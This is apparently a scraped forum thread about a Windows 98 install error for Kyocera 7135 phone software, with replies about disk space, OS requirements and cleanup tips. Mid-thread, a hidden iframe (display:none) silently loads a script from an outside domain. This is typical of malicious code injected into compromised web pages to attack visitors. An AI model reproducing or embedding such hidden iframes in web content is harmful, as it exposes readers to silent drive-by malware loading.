+ Reply to Thread

help already needed

AAAHHHH!!!

When I tried to install the 7135 software included with the phone from Verizon I get this message: "This application cannot start as it cannot create needed files. There may not be enough disk space."

When I had trouble installing my software with my 6035 last year around this time, I ended up completely uninstalling all previous palm software on my computer, then installing the kyocera-branded software only on the computer. So this time I uninstalled all palm/kyocera applications completely before even trying the 7135 installation.

Do I need to put in a completely new Windows operating system? I have Win98 (not 98SE either).

No longer skipping <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Well, that message is pretty simple...delete some of your unneeded stuff. A few mp3's and whatnot

Installing a newer OS on your PC will probably makes things worse, unless you're talking Linux or something .

You have to clean out some junk by deletion, compression, etc. Or add a new hard drive or backup drive.

Check the requirements for the Desktop software. A lot of software these days doesn't support OS's prior to Win98SE. Or you could just be low on disk space. The early Win98 raises a red flag though. Can't you download patches from Microsoft which bring it up to Win98SE?
    ---------------
    The same thing we do every night, Pinky...

The early win98 could be part of it, but that would be a weird error message... unless this diskspace is a problem on top of it. Either way, I'd check the diskspace first, because any OS patch would just take up more valuable space.

The software should run on Win95 with no problems and definitely on Win98.

It might be more useful if you give us some information:

how old is your computer and how big is the harddrive. How much free space in on the harddrive.

Have you run the utilities to free up space on the computer, i.e. have you defragmented it? or used someting akin to a Norton program to free up space?

Blow out the cache/history on your internet program, delete unused games or songs, and clean up your email trash bins.

you could also uninstall programs you don't use and/or components of windows you don't use, i.e. the accessibilty options, online services, desktop themes, multilanguage support ...